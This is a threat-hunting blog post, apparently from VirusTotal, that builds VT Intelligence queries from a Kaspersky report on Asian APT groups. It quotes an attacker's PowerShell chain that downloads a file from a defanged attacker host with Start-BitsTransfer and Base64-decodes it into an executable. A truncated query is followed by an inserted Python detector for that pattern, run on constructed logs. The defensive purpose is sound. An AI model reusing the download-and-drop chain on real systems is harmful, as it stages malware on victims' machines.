Actionable Threat Intel (VI) – A day in a Threat Hunter’s life

Kaspersky’s CTI analysts recently released their Asian APT groups report, including details on behavior by different adversaries. Following our series on making third-party intelligence actionable using VirusTotal Intelligence, we have put on our threat hunter’s hat to find samples and monitor activity based on the report’s details.
Many of the behaviors shared by Kaspersky are based on the use of LOLBAS by attackers once they have set foothold on the victim. This is an increasing trend among adversaries, which makes it critical for security analysts to understand these binaries' capabilities.
Let’s start by analyzing the most interesting bits we found in the report.

Start-BitsTransfer

Start-BitsTransfer is a cmdlet that supports the download of multiple files, which seems to be an alternative for adversaries to the more commonly used bitsadmin.exe binary. The report describes its use in different cases; here is one example:
PowerShell "Start-BitsTransfer -Source hxxp://security.lomiasecure[.]net/crx/node.txt -Destination C:\Users\public\node.txt -transfertype download"
PowerShell if($InputString = Get-Content 'C:\users\public\node.txt'){ [System.IO.File]::WriteAllBytes('C:\users\public\node.exe', [System.Convert]::FromBase64String($InputString))}
The example uses FromBase64String and WriteAllBytes, so our query looks for either of them using an OR condition, combined with the presence of the "Start-BitsTransfer" cmdlet in the sandbox behavior. The following VT Intelligence query obtains samples with similar (not identical) behaviors.
behavior_processes:"Start
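The same hunting logic (Start-BitsTransfer AND (FromBase64String OR WriteAllBytes)) can be applied to PowerShell script-block log entries on an endpoint instead of sandbox reports. This is an added example, not code from the original post or from VirusTotal; the log entries, process ids and URL are constructed, and the logic groups blocks per process so that the download and the decode-and-drop step may arrive as separate entries, as in the report's example.

```python
import re
from collections import defaultdict

# Constructed PowerShell script-block entries (not real telemetry). Process 4312 mirrors the
# chain from the report; 5100 and 6021 are benign single uses of one indicator each.
SAMPLE_EVENTS = [
    {"pid": 4312, "script": r"Start-BitsTransfer -Source http://example.invalid/crx/node.txt "
                            r"-Destination C:\Users\public\node.txt -transfertype download"},
    {"pid": 4312, "script": r"if($InputString = Get-Content 'C:\users\public\node.txt'){ "
                            r"[System.IO.File]::WriteAllBytes('C:\users\public\node.exe', "
                            r"[System.Convert]::FromBase64String($InputString))}"},
    {"pid": 5100, "script": r"Start-BitsTransfer -Source \\fileserver\share\update.msi "
                            r"-Destination C:\Temp\update.msi"},
    {"pid": 6021, "script": r"$cfg = [System.Convert]::FromBase64String($env:APP_CONFIG_B64)"},
    {"pid": 7003, "script": r"Get-Process | Export-Csv C:\Temp\procs.csv"},
]

# First condition: the BITS download cmdlet.
BITS_RE = re.compile(r"Start-BitsTransfer", re.IGNORECASE)
# Second condition: either of the decode / write-to-disk calls (the OR from the query).
DECODE_WRITE_RE = re.compile(r"FromBase64String|WriteAllBytes", re.IGNORECASE)


def hunt(events):
    """Return sorted pids whose script blocks show both a Start-BitsTransfer download
    and a FromBase64String / WriteAllBytes step, evaluated across all blocks of the process."""
    flags = defaultdict(lambda: {"bits": False, "decode": False})
    for ev in events:
        f = flags[ev["pid"]]
        if BITS_RE.search(ev["script"]):
            f["bits"] = True
        if DECODE_WRITE_RE.search(ev["script"]):
            f["decode"] = True
    return sorted(pid for pid, f in flags.items() if f["bits"] and f["decode"])


if __name__ == "__main__":
    print("suspicious pids:", hunt(SAMPLE_EVENTS))  # → [4312]
```

A process that only downloads with BITS, or only decodes Base64, is not flagged; both indicators must appear within the same process, which keeps the rule close to the "similar, not identical" behaviors the VT query is after.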

[…]

This article has been indexed from VirusTotal Blog